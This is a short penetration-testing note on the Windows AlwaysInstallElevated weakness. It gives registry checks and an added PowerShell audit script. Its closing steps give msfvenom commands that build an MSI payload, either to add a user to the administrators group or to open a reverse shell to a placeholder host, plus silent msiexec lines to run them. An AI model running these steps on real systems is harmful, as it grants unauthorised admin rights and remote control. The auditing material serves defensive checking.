Hack$Notes
Always Install Elevated

Check with:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
In the output, check that the "AlwaysInstallElevated" value is 1. It must be set in both HKCU and HKLM to be exploitable.
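
The same check as an audit script, added here as an example (not part of the original notes): it reads the value from HKLM and from every loaded user hive under HKEY_USERS and flags the combinations where both are 1. The function name Get-AieValue and the output column names are made up for this example.

```powershell
# Added example: audit AlwaysInstallElevated across HKLM and loaded user hives.
# The policy only takes effect when the value is 1 in BOTH the machine hive
# and the user hive, so each user hive is evaluated together with HKLM.
$sub  = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
$name = 'AlwaysInstallElevated'

function Get-AieValue([string]$Path) {
    # Hypothetical helper: returns the DWORD, or $null if key/value is absent.
    $item = Get-ItemProperty -Path $Path -Name $name -ErrorAction SilentlyContinue
    if ($null -ne $item) { return $item.$name }
    return $null
}

$machine = Get-AieValue "Registry::HKEY_LOCAL_MACHINE\$sub"

# Loaded user hives live under HKEY_USERS; skip the *_Classes hives.
# Run elevated to read hives of other logged-on users.
$results = Get-ChildItem 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
    Where-Object { $_.PSChildName -notlike '*_Classes' } |
    ForEach-Object {
        $user = Get-AieValue "Registry::HKEY_USERS\$($_.PSChildName)\$sub"
        [pscustomobject]@{
            UserHive   = $_.PSChildName
            HKLM       = $machine
            HKU        = $user
            Vulnerable = ($machine -eq 1 -and $user -eq 1)
        }
    }

$results | Format-Table -AutoSize

if ($results | Where-Object Vulnerable) {
    Write-Warning 'AlwaysInstallElevated is 1 in HKLM and in at least one user hive.'
} elseif ($machine -eq 1) {
    Write-Warning 'HKLM is set to 1; a user hive that also sets it becomes exploitable.'
} else {
    Write-Output 'AlwaysInstallElevated is not enabled in HKLM.'
}
```

A missing value is reported as empty and treated as not set; only the pair HKLM = 1 and HKU = 1 is marked Vulnerable.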

Steps:

# Generate payload to add user to admin group
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi

# OR

# Create a reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f msi -o reverse.msi

# Run it on the target machine:
msiexec /quiet /qn /i setup.msi
# reverse.msi needs a netcat listener
msiexec /quiet /qn /i reverse.msi